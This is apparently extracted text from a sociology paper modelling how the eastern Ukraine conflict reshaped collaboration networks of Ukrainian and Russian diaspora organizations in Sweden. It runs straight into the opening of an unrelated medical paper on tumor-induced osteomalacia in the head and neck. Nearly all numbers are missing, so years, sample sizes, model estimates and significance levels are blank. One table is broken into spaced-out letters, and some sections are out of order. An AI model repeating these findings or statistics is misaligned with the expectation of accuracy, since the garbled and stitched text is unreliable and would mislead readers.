back home reorganizing the meanings of ethnicity  through the focus of activity studies of ethnicity and inter-ethnic relationships usually tend to understand ethnicity as a characteristic at the core identity (chow and bowman, ). i believe taking the model of focused social ties (feld, ) discussed above grants the possibility of studying ethnicity without these essentialist assumptions. it creates a theoretical possibility for understanding ethnicity and diasporic communities through action as constructed through maintenance of ethnic boundaries (wimmer, ). in the current study, i suggest that collaboration of ethnic organizations is often based on the perceptions of shared “routes” and heritage. however, in times of war in the homeland, a reorientation might take place, usually through activities such as demonstrations and different campaigns connected to the developments “back home.” in this way, the war in the homeland can become symbolically transported into the everyday of the diasporic organizations and thus become a focus of activity too. often, in order to raise an awareness about the developments in the homeland, the best way for these organizations would be to gather as many people as they can. hence, organize the similar others around them through activities related to the conflict that is happening thousands of miles away. at the same time, those who previously were non-political or even active at all might become mobilized to action as well. therefore, the restructuring of the organizational field by the conflict attitudes might take place. put in other words, if the war in the homeland has no implication for the collaboration networks, they would probably be characterized either by same ethnicity pairs, or not dominated by ethnic identifi- cation at all (only structural network characteristics would matter for the collaborations in this specific case, such as, e.g., large and famous organizations would be more likely to receive invitations to collabo- rate). on the other hand, if collaborations tend to be dominated by pairs that share a similar attitude to- ward the conflict, this could be a potential indicator that the war in the homeland has had a shaping role in the evolution of the collaboration networks. hypotheses in this section, i aim to clarify three main hypotheses that follow from the theoretical discussion above: h . there is some collaboration between ukrainian, russian, and russian-speakers’ organizations during the period studied. the collaborations are not dominated by organization pairs with the same ethnicity. this hypothesis suggests that there is some collaboration between ukrainian, russian, and russian-speakers’ organizations due to shared religion or traditions as well as, in some cases, a common spoken language. h . during the to period, ukrainian organizations tended to collaborate with other ukrainian organizations, and russian organizations with other russian organizations. organizations might have collaborated with each other along the homogenous narrative of a shared past and/ or language, similar ideas on common “roots,” etc., only within clear ethnic boundaries. this hypothesis refers to the possibility that during the revolution and subsequent war, this line of organizational collaboration remained the same. this scenario would showcase that while ethnicity is the main focus of the organizations, the developments in ukraine were not reflected in the processes of network clustering. h . organizations that share attitudes relating to the conflict tend to collaborate more with each other than with organizations with other attitudes during the period studied. in this scenario, organizational field of collaboration networks have reoriented from primarily subjectively identified ethnicity to standpoints on the armed conflict in eastern ukraine. thus, the third hypothesis suggests that the armed conflict in eastern ukraine can be regarded as a focus of activity for russian and ukrainian organizations in sweden (see fig. ). data collection the organizations researched in this study do not officially help with accommodation, work, or legal issues for the newly arrived migrants. the organizations that were created in the earliest period of critical developments in ukraine (late – ) were concerned with the protests, assessing them either positively and showing support or negatively and treating the revolution as a coup – in the latter case often connecting it to western political power struggles and conspiracies, connections or nationalist organizations active in ukraine. later, with the beginning of the armed conflict in eastern ukraine, a few organizations were created to send humanitarian help, among other activities, and some were created to spread information about the political developments in ukraine. organizational network data collection started in early . the network data were collected retrospectively through interviews and from official facebook pages and websites of different russian, russian-speaking, and ukrainian organizations. the main sampling method was to trace each organization from the connections of the previous one until the referrals led to the same organizations that were already in the database. the criteria for actors to appear in the network were: (i) the organization is russian, ukrainian, russian/ukrainian-speaking or active in connection with the conflict in eastern ukraine and (ii) the organization is based in sweden. actors could not be a political party or a governmental agency. some organizations based outside of sweden were included in the data collection but are not included in the data set for this analysis. the edges in the studied networks are all positive referrals and no negative (e.g. if organization a states that they will never collaborate with organization b, they have been excluded). since the referral tracing data collection method was employed, some specific issues about the network boundaries should be mentioned. the first criteria for appearing in the network included organizations that are somehow active in connection with the conflict in eastern ukraine. some of such organizations were generated by the conflict in eastern ukraine, while others have a broader set of activities and included in their agenda only a few events and collaborations that had to do with the conflict in eastern ukraine. in the first case, the conflict-generated organizations have been included as an edge sender and receiver node. in the latter case, the organization was coded only as an edge receiver. this was done to limit the network to only those organizations that are primarily focused on the conflict or identify themselves as russian, russian-speaking, or ukrainian, while including potential collaborations with organizations that have a broader set of activities and agenda overall. the main motivation for including those organizations only as edge receivers was also to account for the theoretical possibility that the antagonist organizations could be connected through these broader organizations. therefore, if not included at all, the network structure could be seriously implicated. the cumulative data for the period from to included edges between different organizations. however, for this analysis, the final data set consisted of organizations located in sweden (including international ones with a chapter in sweden) during the period to . table shows that there are ukrainian organizations and russian organizations that clearly identify as such. the category “mixed” includes organizations that have members that identify themselves as russian, ukrainian, or other countries that used to be part of the soviet union or are russian-speaking. some of these organizations also identify themselves as slavic. the fact that there are more specifically ukrainian organizations reflects the phenomenon described elsewhere (author’s other unpublished article), qualitatively, namely that the people who were not happy with the claims of neutrality of the pan-slavic organizations could demand a clear standpoint and even leave the organization if that demand was not satisfied. some of these people could also start their own organization. on the other hand, if an organization became more political during the war, some members might not have felt completely happy with such course of events, and leave the organization as well. furthermore, many organizations in the data set have been created as a direct response to the conflict, while claiming no identification with a specific ethnicity. it is important to also note here that since it has been possible to identify with a certain conflict side only after the conflict started, some of the already existing organizations had to choose whether they wanted to be neutral or not. six out of the eight pro- russian organizations have been created directly to acknowledge their attitudes toward the conflict. this is visible through the names of these organizations as well as their open declarations. out of all the figure : focus of the conflict for diasporic organizations in another country, a model. a h g no m l f i j k c e d b pro-side a pro-side b neutral space ukrainian and russian organizations in sweden and the conflict back home pro-ukrainian organizations, only two were created during and started by organizing demonstrations to raise awareness about political developments in ukraine during the month of the maidan revolution. the rest were pre-existing organizations that declared their support for the ukrainian revolution. an interesting case is portrayed by the fact that out of four explicitly russian organizations, only one claims to politically align with the pro-russian side in the conflict. however, out of the ukrainian organizations – are also pro-ukrainian. another interesting case is that of organizations that do not claim any ethnic identification (although in most cases these are predominantly russian-speaking) but have been created to support the pro-russian side of the conflict. taking these issues into account, and the fact that out of the organizations analyzed in the current research, eight organizations were created with an aim directly connected to the current ukrainian–russian conflict, it can be suggested that the collaboration networks have also been changing according to the developments in ukraine. to analyze the networks, i use exponential random graph models (ergms) as they provide a method for modeling the probability of tie formation simultaneously for both the node attributes, such as ethnicity or type of organization, and the structural network statistics, such as triadic relationships or reciprocity between the organizations. one of the most important features of the ergms is that they assume network self-organization, in other words, tie dependence on each other. in comparison to other methods used in social sciences that assume independence of the individual subjects of one another, ergms give a more intuitive conceptualization of social networks as based on interconnectedness of actors in them. ergms also allow a lot of freedom for the researcher, by allowing multiple parameters to account for in the model, both concerning summary network statistics but also actor attributes (lusher et al., ). in addition, ergms have often been used for the analysis of organizational collaboration networks (fischer and jasny, ). as for limitations, ergms require a complete network to perform well (lusher et al., ). to the best of the author’s knowledge, all ukrainian, russian, russian-speaking, or conflict-generated organizations active in sweden from to have been included in the data set. however, the issues of network boundaries and inclusion criteria, as discussed above, might potentially have some implications for the parameters’ estimation of the ergms. in addition, since ergms are relatively new, in terms of development of the software, and are computationally intensive, they often lack convergence. therefore, it is not always possible to compute every model, especially in the case of large networks (lusher et al., ). data variables and measures the attribute data for the nodes include information such as: type of organization (independent, umbrella, multinational), side taken by the organization in the conflict (pro-russian, pro-ukrainian, neutral/no explicit statement), and “ethnicity” of the organization (ukrainian, russian, mixed russians and ukrainians, other ethnicity, no connection to any ethnicity/ nationality). the two attributes of most interest for the current paper are organizational “ethnicity” and organizational choice of sides in the conflict. i treat table  . data frequencies. conflict side ethnicity neutral pro-russian pro-ukrainian total mixed (russian-speaking) not national other national organizations russian ukrainian total connections pro-russian, pro-ukrainian, or neutral as the three least complex attitudes toward the armed conflict in eastern ukraine that can be distinguished. by pro- russian attitude, i mean following the official position of the russian federation government on both the maidan revolution and the ongoing war. this means that organizations sharing this attitude believe that the maidan revolution was a coup, and that there has been a threat to the russian population in eastern ukraine, which justifies russian troops in the region, while also supporting the annexation of the crimean peninsula (osce russian delegation statement, ; address by the president of the russian federation from march , retrieved march ). by pro-ukrainian attitude, i mean following the official position of the ukrainian government that condemns the annexation of the crimean peninsula, does not believe there was a threat to the russian population in eastern ukraine after the maidan revolution, and sees the revolution as getting rid of the corrupt government serving under the v. yanukovych presidency (ukraine ministry of foreign affairs, ). by neutral attitude, i mean that either an organization explicitly stated its neutrality in the matters of the conflict or they never had any event, post, or statement about any of these events on their official web pages. model specifications ergms are not suitable for the data set because it only dates back to september, and thus has a very limited amount of both nodes and edges. however, that year was not yet marked by war or numerous deaths during the protests. the most active period, as discussed in the previous sections, was between the years and and which settled down by , at least in comparison to the previous years (uppsala conflict data program). therefore, the analysis here will only concern the period from to . all the models include the term “edges,” which serves as an intercept in the ergms and is a baseline probability of the tie formation (lusher et al., , p. ). all the models start with the same baseline model, which includes network statistics such as measures of reciprocity and (in) transitivity as well as geometrically weighted in- and out-degrees, which are more stable terms for controlling for degrees. they work by imposing a specific rate of decay by degree to control for the nodes with a higher degree to contribute less than those with lower degrees (capturing popularity and activity spread) (lusher et al., , p. ; morris et al., ). every model also includes the term “intransitive,” which controls for the effects of triplets of type d, , u, c, or c (as per davis and leinhardt’s, typology) and thus relates to clustering of the networks. this term is useful for the observed data since, as will become evident later in the descriptive analysis of the networks, most cases are characterized with low transitivity indices. in sum, together with reciprocity, the intransitivity term controls for effects of connectivity of the triplets. this specification helps for model convergence and fit since it “powers” the geometrically weighted terms. as for the node attributes that are covariates in the baseline models, these include type of organization, “ethnicity,” and the conflict side. since some of the organizations are umbrella organizations or relatively bigger in size and fame than others, this measure captures the size of the node and thus also its attractiveness and popularity to a certain degree. the second step adds a homophily term to test whether organizations that support a certain side of the conflict tend to form ties with other organizations that have exactly the same view on the conflict. unfortunately, only for the models was it also possible to check the tendency of pro-ukrainian organizations to specifically connect to other pro- ukrainian organizations, and pro-russian ones to other pro-russian ones (the model could converge with this particular specification of the term, while all the other models for the other networks lacked convergence). finally, the third step adds a homophily term on “ethnicity” of the organizations and tests whether organizations that identify with a certain ethnicity tend to form ties with organizations with the same identification. as will be shown with descriptive results, especially for ukrainian organizations, since there may be little heterogeneity on the standpoint toward the conflict and ethnicity, i performed multicollinearity checks for all the models that have both ethnic identification and conflict side parameters, by running them together and separately and comparing the results. if the results were different, then the full model included both “ethnicity” and “conflict side.” if they were not different, then the best fitted model is shown. to assess the fit of the models, i use the aic (the smaller the better) estimate and the goodness-of- fit plots of the models given by the “statnet:ergm” package in r software. the goodness of fit of the model is judged by the fit of degree distributions. i use p-values to assess the significance of the model parameters. many argue that the p-value has a ukrainian and russian organizations in sweden and the conflict back home meaning only in relation to what it could mean in the data and to the external context of the analysis, thus having a strict approach and regarding a parameter as significant only up to . level can be unnecessary and limiting. in addition, even though the ergm statnet package uses p-values, the ergms use monte carlo maximum likelihood estimation, for which taking confidence intervals as significance estimators makes more sense (lusher et al., ). therefore, i regard a parameter in the model as significant if the p-value has a value of up to . (at four levels). results descriptive and univariate  network analysis the period from to can be characterized by the growth of both the number of organizations and the amount of interorganizational connections for reasons discussed in the previous sections. the figure : network plots for the years of to (from left to right, row-wise). four networks are completely different in structure, size, and also the frequency of interactions or the number of edges (table and fig. ). moreover, new nodes appear in the network throughout the different years; hence, they should be analyzed separately (table ). there is little transitivity between the nodes during and . in , the transitivity index suggests that some sort of clustering was taking place. similarly, the network plots (fig. ) seem to further indicate some clustering along the ethnicity lines, especially for the years and . if we take a closer look at the network plots for all the years (fig. ), in all of which the size of the node is based on the node degree, the above network properties also seem to have a strong relation with the node attributes (in fig. , the nodal ethnicity attributes are shown in color). in addition to the descriptive properties discussed above, the plots hint on the clustering along ethnicity lines, which is stronger starting from year in the data set. connections figure : cross-tabulation correspondence map between categories “ethnicity” and “side of the conflict” in the data set. table  . descriptive network statistics. network size density edges (total) reciprocity transitivity . . . . . . . . . . figure shows further that most of the ukrainian organizations in the data set are on the pro-ukrainian side, while russian organizations take both pro-russian and neutral positions, and organizations that are mixed or do not self-identify with any ethnicity have a lot of heterogeneity. moreover, the absence of pro-ukrainian–russian organizations as well as pro-russian ukrainian organizations can also suggest that the conflict’s effect on the organizational network structure and that, at least for some organizations, the conflict in eastern ukraine, may have become a focus of activity, or possibly something that partially defines the organizational identity. however, it is impossible to say whether this clustering is statistically meaningful and whether it is due to the data collection, the structure of the network, the node attributes, or the intersection of all three without any statistical inference. the next section aims to test exactly this question. ergm results i start with the results from the model, which are presented below (table ; fig. a ). the best fit from all of the three steps performed in the model is shown by step two, which takes into account homophily based on the attitude towards conflict. interestingly, none of the covariates in the model are significant. the fact that neither the network structure nor nodal attributes of interest are significant, can pinpoint to the lag in creation of organizations that were specifically pro- russian as in comparison to those which were pro- ukrainian. in addition, since all the steps are showing very similar aic values, the geometrically weighted in-degree parameter’s significance and positive value ukrainian and russian organizations in sweden and the conflict back home table  . exponential random graph model for   network. baseline model step  step  covariates estimate se estimate se estimate se edges/intercept − . . − . . − . . reciprocity . . . . . . intransitive − . . − . . − . . gw out-degree − . . − . . − . . gw in-degree (fixed . ) . . . . . . . org. type umbrella organization − . . − . . − . . global independent organization – reference category . . . . . ethnic ident. ukrainian . . russian . . mixed (ukrainian and russian) – reference category . other – – no ethnic ident . . conflict side pro-russian pro-ukrainian neutral – reference category homophily on conflict side – . . on ethnic identification – . . aic . . notes: = ***; . = ** = . ; * = . ; . = . . in the baseline may give some information about the network. as discussed earlier, late to early saw many new organizations being created as a direct response to what was happening in ukraine. a lot of these organizations aimed to show support or opposition toward the revolution or, later, the developments in eastern ukraine. to be able to have a bigger impact, many of these organizations may have started to connect to other big organizations that were already established before and thus had more “power” in this particular field. this would contribute to the larger popularity (measured by geometrically weighted in-degree) of some actors in the network, showing that the network is centralized on in-degree. on the other hand, some organizations may have been very active in reaching out to many other organizations to make themselves known in this field. therefore, the analysis of the network suggests that there is some potential clustering in the network. however, since neither ethnicity nor attitude toward the conflict is significant as well as reflecting that there is no homophily in the collaboration network based on shared attitudes toward the conflict – h is supported. for the network (table ; fig. a ), step of the models shows the best fit. both network structure and node attributes matter for the log-odds of a tie between the organizations in . the large negative value on the intercept (term, edges) means that the network is sparse. the “intransitive” term is significant and negative, suggesting the tendency for decreasing number of intransitive triplets. interestingly, the reciprocity term is now positive and significant. these two terms taken together give indication toward the connections t a b le   .  e x p o n e n ti a l r a n d o m  g ra p h  m o d e l f o r   n e tw o rk . b a se lin e  m o d e l s te p   s te p   c o va ri a te s e st im a te s e e st im a te s e e st im a te s e e d g es /in te rc ep t − . ** * . − . ** * . − . ** * . re ci p ro ci ty . ** . . * . . ** . in tr an si tiv e − . . . − . . . − . . . g w in -d eg re e (fi xe d . ) . . . . . . g w o u t- d eg re e (fi xe d . ) − . ** * . − . ** * . − . ** * . o rg . ty p e u m b re lla o rg an iz at io n . . . . . . g lo b al in d ep en d en t o rg an iz at io n – r ef er en ce ca te g o ry . . . . . . et h n ic id en t. u kr ai n ia n r u ss ia n m ix ed (u kr ai n ia n a n d r u ss ia n ) – re fe re n ce c at eg o ry . . . . o th er n o e th n ic id en t. co n fli ct s id e p ro -r u ss ia n − . . p ro -u kr ai n ia n − . . n eu tr al – r ef er en ce c at eg o ry h o m o p h ily co n fli ct s id e p ro -r u ss ia n . . p ro -u kr ai n ia n . . . et h n ic id en t. m ix ed . . u kr ai n ia n . . a ic . . . n o te s: = ** *; . = ** = . ; * = . ; . = . . ukrainian and russian organizations in sweden and the conflict back home another significant covariate of the model is the conflict side, where the pro-russian side has a significant and positive value. this shows that organizations that are pro-russian tend to have higher log-odds of a tie with any other organization than those that do not take a clear side in the conflict. this may suggest that the significance of sharing a point of view with an organization that other organizations connect to does not have the same meaning anymore. one reason could be that in the year before, the definitions of the sides of support were already established and these organizations that share the same views have already connected; perhaps, it makes more sense to expand the connections, or not, to other organizations no matter what their view. thus, h is supported. discussion and conclusions the results show that the conflict in eastern ukraine may have become a focus of activity for many ukrainian and russian organizations active in sweden. the clustering of the organizations along the conflict attitude lines is shown to be significant, especially during the most violent period of the war ( ). the pro-ukrainian organizations seem to be more active and show a stronger tendency for homophily, especially in the network. the results also show that the side of the conflict that an organization takes might be a stronger driver to collaborating with other organizations, thus suggesting that the re-identification of the organization from only based on identification with a certain ethnicity to primarily conflict-oriented took place during the period studied. in other words, it is the attitude toward the conflict that might now define collaboration decisions, and not only the perception of similar “roots and routes.” in addition, early saw some pro-ukrainian organizations being created as a response to the maidan revolution and most ukrainians proclaiming their political orientation (mostly pro-revolution) toward it. on the other hand, in late and , a lot of pro- russian organizations (six) were created as a response to the openly acknowledged russian involvement, while the pre-existing russian organizations claimed mostly neutrality. by late , most of the organizations had a fixed political stance, including neutrality. these pro-russian organizations rarely claimed to be russian, and were mostly concerned with spreading the “truth” about the conflict in eastern ukraine. this has further driven and changed the field according to the conflict lines and pushed the organizations to collaborate only with those who share the same view on the conflict. more specifically, by difference in the network structure and show that reciprocal connections in were more likely. the in-degree term is not significant for the network in , as opposed to the out-degree. more precisely, it shows a relatively large negative value. the geometrically weighted out-degree term measures the activity spread; in cases where it is negative, it indicates that the majority of the actors in a network have similar levels of activity and thus, the network is not centralized on out-degree (lusher et al., ). this suggests that in , the organizations that were created in to in response to the conflict in eastern ukraine were already established within the structure at that point. what is most interesting about step in the network model is the significant (at . level) homophily value on the supported side of the conflict term for pro-ukrainian organizations, which suggests that pro-ukrainian organizations tend to have ties with similar (pro-ukrainian) organizations. while performing the sensitivity analysis, the fit of the model without controlling for ethnic identification was better. however, since the descriptive analysis showed that there is little variation for the ukrainian organizations in their attitudes toward the conflict, it can be assumed that this model does capture ethnicity. however, step of the model shows ethnic homophily as non-significant, and does not converge if the control for conflict side attitude is taken out. thus, it could arguably be understood that the attitude toward the conflict is a more steering parameter than ethnicity. therefore, h is supported by the results from the network. this was the only model that managed to converge with detailed ethnicity specifications. the model for the network (table ; fig. a ) shows the best fit in the baseline. unfortunately, due to technical issues related to the computations in the ergms, steps and in the models for the network did not converge and thus are not presented here. after performing a sensitivity check, and to avoid multicollinearity, the better fit model in the baseline was the one using conflict side as a control, and not ethnicity. again, the large negative value on the intercept means that the network is sparse, while geometrically-weighted in-degree being significant and positive indicates that larger organizations might be receiving more connections, and the non-significance of the negative “intransitive” term that controls for the intransitive triplets which all suggest that clustering within the network remains. the geometrically weighted out-degree term is still negative and indicates that most actors have a similar level of activity and that the network does not tend to be centralized on the out-degrees (lusher et al., ). connections , the pro-ukrainian organizations were more likely to collaborate with other organizations that identified as being pro-ukrainian. interestingly though, the pro- ukrainian organizations were less likely to have ties and thus engage in collaboration by , probably because all the pro-ukrainian organizations had already collaborated with each other by that point. in addition, after most of the pro-ukrainian organizations connected with each other, there were none left in the organizational field – and with no new organizations being created, by the pro-ukrainian organizations were less likely to collaborate with others in general. on the other hand, the pro-russian organizations tended to be more likely to collaborate with other organizations in , which is interesting since they were not significantly different from the neutral organizations in and . one explanation could be that many of the pro-russian organizations became most active and established in the organizational field in the late and , and therefore only in could they accumulate enough collaborations to be somewhat different from the neutral ones. to summarize, the fact that the attitude toward conflict explains tie formation within the collaboration networks for and better than ethnicity suggests that conflict in the homeland can become a focus of activity for organizations in a third country, and in this sense rearrange the organizational field. ethnic homophily probably present before, and based on already established relations and boundaries, loses its clustering potential when a new focus appears as an important factor for activism. this further suggests table  . exponential random graph model for   network  (steps   and   not converged). baseline model covariates estimate se edges/intercept − . * . reciprocity . ** . intransitive − . . gw in-degree . . . gw out-degree − . *** . org. type umbrella organization − . . independent organization – reference category . . global . . ethnic ident. ukrainian russian mixed (ukrainian and russian) – reference category other no ethnic id. conflict side pro-russian . * . pro-ukrainian − . . neutral – reference category . . homophily on conflict side on ethnic ident. aic . notes: = ***; . = ** = . ; * = . ; . = . . ukrainian and russian organizations in sweden and the conflict back home that ethnic boundary-making processes are contextual and evolving, not only in relation to the context of the country of residence but also with regard to the political developments in the home country. similar to féron ( ), i suggest that conflict may become de-territorialized from its geographical location using similar symbols and ideas; however, thereafter, it can become reshaped within the context of diasporic experiences and finally become autotomized from the original conflict. this can be the case with the russian and ukrainian organizations as they seem to have renegotiated collaboration practices from basing them on ethnic identification to verification of the attitude to the conflict of the other organizations. furthermore, these results may indicate that the meaning of ethnicity for the studied organizations, especially those identifying as ukrainian, has become intertwined with the perception of the conflict in eastern ukraine, and thus incorporating being pro-ukrainian in a political sense, with the meaning of being ukrainian within the multiple understandings of defining ethnicity. finally, although not generalizable, the results found in this study further suggest that armed conflicts can be “imported” or re-territorialized into other contexts and should be accounted for when studying ethnic groups, transnational communities, or diasporas whose “homeland” has been in an ongoing armed conflict. references address by president of the russian federation. available at: http://en.kremlin.ru/events/president/ news/ (accessed march , ). baser, b. . diasporas and homeland conflicts: a comparative perspective, ashgate publishing. blau, p. m. . inequality and heterogeneity: a primitive theory of social structure, macmillan company. brubaker, r. . the ‘diaspora’ diaspora. ethnic and racial studies ( ): – , available at: https://doi. org/ . / chow, r. and bowman, p. (eds) . the rey chow reader, columbia university press, new york, ny. coleman, j. . relational analysis: the study of social organizations with survey methods. human organization ( ): – , available at: https://doi.org/ . /humo. . .q m q n conflict in ukraine . socio-economic impacts of internal displacement and veteran return – summary report may (english) | the world bank. available at: http://documents. worldbank.org /curated /en/ / conflict-in-ukraine-socio-economic-impacts-of-internal- displacement-and-veteran-return-summar y-repor t- may- (accessed august , ). crash mh . july , available at: www. onder zoeksraad.nl/en/page/ /crash-mh - - july- (accessed january , ). davis, j. a. and leinhardt, s. . the structure of positive interpersonal relations in small groups, in berger, j. (ed.), sociological theories in progress, vol. , houghton-mifflin, boston, ma. demmers, j. . diaspora and conflict: locality, long-distance nationalism, and delocalisation of conflict dynamics. javnost – the public ( ): – , available at: https://doi.org/ . / . . eder, d. and hallinan, m. t. . sex differences in children’s friendships. american sociological review ( ): – , available at: https://doi.org/ . / embassy of the russian federation in the kingdom of sweden. available at: https://sweden.mid.ru/web/ sweden-en (accessed september , ). embassy of ukraine in the kingdom of sweden. available at: https://sweden.mfa.gov.ua/en (accessed september , ). european external action service website. available at: https://eeas.europa.eu/delegations/ukraine_en/ / eu launches eur million project to support ‘model police stations’ in ukrainian districts and new model of public order policing based on scandinavian approach. feld, s. l. . the focused organization of social ties. american journal of sociology ( ): – . féron, É. . transporting and re-inventing conflicts: conflict-generated diasporas and conflict autonomisation. cooperation and conflict ( ): – , available at: https://doi.org/ . / féron, É. and lefort, b. . diasporas and conflicts – understanding the nexus. diaspora studies ( ): – , available at: https://doi.org/ . / . . fischer, a. and jasny, l. . capacity to adapt to environmental change: evidence from a network of organizations concerned with increasing wildfire risk. ecology and society ( ), available at: https://doi. org/ . /es- - ibarra, h. . homophily and differential returns: sex differences in network structure and access in an advertising firm. administrative science quarterly ( ): – , available at: https://doi.org/ . / jabri, v. . introduction: understanding war and violence. in war and the transformation of global politics, palgrave macmillan, london, pp. – , available at: https://doi.org/ . / _ koinova, m. . sustained vs episodic mobilization among conflict-generated diasporas. international political science review ( ): – , available at: https://doi. org/ . / lagar för ideell förening – bolagsverket. available at: http://bolagsverket.se/fo/foreningsformer/ideell/ lagarideell- . (accessed august , ). lusher, d., koskinen, j. and robins, g. . ex- ponential random graph models for social networks: connections theory, methods, and applications, cambridge univer- sity press. mcpherson, j. m. and smith-lovin, l. . homophily in voluntary organizations: status distance and the composition of face-to-face groups. american sociological review ( ): – . mcpherson, m., smith-lovin, l. and cook, j. m. . birds of a feather: homophily in social networks. annual review of sociology ( ): – , available at: https://doi.org/ . /annurev.soc. . . marsden, p. v. . core discussion networks of americans. american sociological review ( ): – , available at: https://doi.org/ . / marsden, p. v. . homogeneity in confiding relations. social networks ( ): – , available at: https://doi.org/ . / - ( ) -x migrationsverket. available at: www.migrationsverket. se (accessed december , ). ministry of foreign affairs of ukraine. briefings and video comments, available at: https://mfa.gov.ua/en/ press-center/briefing (accessed march , ). moliner, c. . frères ennemis? relations between panjabi sikhs and muslims in the diaspora. south asia multidisciplinary academic journal , available at: https://doi.org/ . /samaj. morris, m., handcock, m. s. and hunter, d. r. . specification of exponential-family random graph models: terms and computational aspects. journal of statistical software ( ): – . oberschall, a. . the manipulation of ethnicity: from ethnic cooperation to violence and war in yugoslavia. ethnic and racial studies ( ): – , available at: https://doi.org/ . / ooka, e. and wellman, b. . does social capital pay off more within or between ethnic groups? analysing job searches in five toronto ethnic groups, in fong, e. (ed.), inside the mosaic, university of toronto press, toronto, buffalo, london, pp. – , available at: www.jstor.org/ stable/ . / . portes, a., escobar, c. and arana, r. . bridging the gap: transnational and ethnic organizations in the political incorporation of immigrants in the united states. ethnic and racial studies ( ): – , available at: https://doi.org/ . / ragazzi, f. . diaspora: the politics of its meanings. international journal of political sociology ( ): – , available at: https://doi.org/ . /j. - . . _ .x riksbank. available at: www.riksbank.se/en-gb/ (accessed april , ). sida: ukraine. available at: www.sida.se/english/ where-we-work/europe/ukraine-/ (accessed december , ). smith, j. a., mcpherson, m. and smith-lovin, l. . social distance in the united states: sex, race, religion, age, and education homophily among confidants, to . american sociological review ( ): – . statement by the delegation of the russian federation on the situation in ukraine and the need to implement the minsk agreements|osce. available at: www.osce.org/ permanent-council/ (accessed august , ). statistikmyndigheten scb. available at: www.scb. se/ (accessed december , ). ucdp – uppsala conflict data program. available at: http://ucdp.uu.se/ (accessed january , ). un documents for ukraine. available at: www. securit ycouncilrepor t.org/un-documents/ukraine/ (accessed august , ). un office for the coordination of humanitarian aid (ocha) year in review. available at: http:// interactive.unocha.org /publication/ _year_ in _ review/ (accessed march , ). un security council meeting on seized ukrainian vessels. available at: www.un.org/press/en/ / sc .doc.htm (accessed march , ). vertovec, s. . conceiving and researching trans- nationalism. ethnic and racial studies ( ): – , available at: https://doi.org/ . / wimmer, a. . elementary strategies of ethnic boundary making. ethnic and racial studies ( ): – , available at: https://doi.org/ . / ukrainian and russian organizations in sweden and the conflict back home figure a : goodness-of-fit plot for the best fit model for network. : goodness-of-fit diagnostics minimum geodesic distance edge-wise shared partners indegree outdegree appendix. goodness-of-fit diagnostics i am presenting goodness-of-fit plots only for the best fit models per year. connections figure a : goodness-of-fit plot for the best fit model for network. :goodness-of-fit diagnostics minimum geodesic distance edge-wise shared partners in-degree out-degree ukrainian and russian organizations in sweden and the conflict back home figure a : goodness-of-fit plot for the best fit model for network. indegree outdegree : goodness-of-fit diagnostics minimum geodesic distance edge-wise shared partners : – r shah et al. case series of head neck tio and review research tumor induced osteomalacia in head and neck region: single center experience and systematic review ravikumar shah , anurag r lila , swati ramteke-jadhav , virendra patil , abhishek mahajan , sushil sonawane , puja thadani , anil dcruz , prathamesh pai , munita bal , subhada kane , nalini shah and tushar bandgar department of endocrinology, seth gs medical college & kem hospital, parel, mumbai, india department of radiodiagnosis and imaging, tata memorial hospital, mumbai, maharashtra, india department of head neck surgery, tata memorial hospital, mumbai, maharashtra, india department of pathology, tata memorial hospital, mumbai, maharashtra, india correspondence should be addressed to a r lila: anuraglila@gmail.com abstract tumor-induced osteomalacia in the head and neck region remains a challenging diagnosis to manage. literature pertaining to management and outcome details remains sparse. we describe two cohorts: cohort included seven patients from a single center in western india with tumors located in paranasal sinuses (n =  ), intracranial (n =  ) and maxilla (n =  ). the unique features from our series is the management of persistent disease with radiation therapy (n =  ) and peptide receptor radionuclide therapy (prrt) (n =  ). cohort two has patients identified from publications for systematic review. paranasal sinuses, mandible, intracranial disease, maxilla and oral cavity, in descending order, are reportedly common tumor sites. within this cohort, mean age was  ±  years at presentation with . % having local symptoms. duration of symptoms varied from to months. pre-surgery mean serum phosphorus was .  ±  .  mg/dl and median fgf- levels were . (iqr: . – . ) times of normal upper limit of normal. majority ( . %) were managed primarily with surgical excision; however, primary radiotherapy (n =  ) and surgery combined with radiotherapy (n =  ) were also reported. twenty patients had persistent disease while nine patients had recurrence, more commonly noted with intracranial and oral cavity tumors. surgery was the most common second mode of treatment employed succeeded by radiotherapy. four patients had metastatic disease. the most common histopathological diagnosis reported is pmt mixed connective tissue, while the newer terminology ‘pmt mixed epithelial and connective tissue type’ has been described in patients. introduction tumor-induced osteomalacia (tio), also known as oncogenic osteomalacia, is a rare paraneoplastic syndrome caused by overproduction of fibroblast growth factor (fgf ) by a tumor. fgf- plays a vital role in renal phosphate handling and vitamin d synthesis. hence, tio is characterized by hypophosphatemia due to renal phosphate wasting, inappropriately normal or low , dihydroxy vitamin d, and elevated or inappropriately normal plasma fgf- . these biochemical alterations eventually result in osteomalacia. due to its rarity, the diagnosis of tio is delayed with the average time from onset of symptoms to diagnosis being more than . years ( ). as a result, patients often present in a debilitated state with multiple fractures, severe muscle weakness - - key words f tumor-induced osteomalacia (tio) f oncogenic osteomalacia f head and neck f systematic review endocrine connections ( ) , – id: - this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access mailto:anuraglila@gmail.com https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com r shah et al. case series of head neck tio and review pb– : and loss of height due to skeletal deformities. even with a high index of suspicion, tumor localization remains challenging as the offending tumor may be very small and can be anywhere in the body. complete tumor resection remains the mainstay of treatment and is known to result in dramatic resolution of symptoms. the first case of tio was reported by robert mccance in who treated a patient having low phosphorus levels and bone pain with high doses of vitamin d suspecting her to be a case of ‘vitamin d resistance’; however, the symptoms did not completely resolve until a tumor found in the femur was removed ( ). thereafter, more than cases of tio have been reported in literature with more than being reported since ( ). the most common tumor site is the lower extremity (> %) followed by the head and neck region (> %) ( ). there have been several reviews on pathological characters of such tumors but there is no comprehensive review describing clinical characteristics and management of patients with tio in head and neck region. this article aims to describe a single-center experience with tio involving the head and neck region followed by a comprehensive clinically oriented review of world literature for the same. materials and methods cohort medical records of patients attending department of endocrinology, kem hospital, mumbai who were diagnosed with tio from january till august were reviewed after obtaining approval from institutional ethical committee ii, seth g s medical college and kem hospital, mumbai. informed consent for the photographs, publication of their clinical details and/or imaging was taken. patients diagnosed with tio involving the head and neck region were identified and reviewed for inclusion. concurrently, patients diagnosed with tio in other regions, and patients with secondary tio ( ) (including neurofibromatosis, epidermal nevus syndrome, and polyostotic fibrous 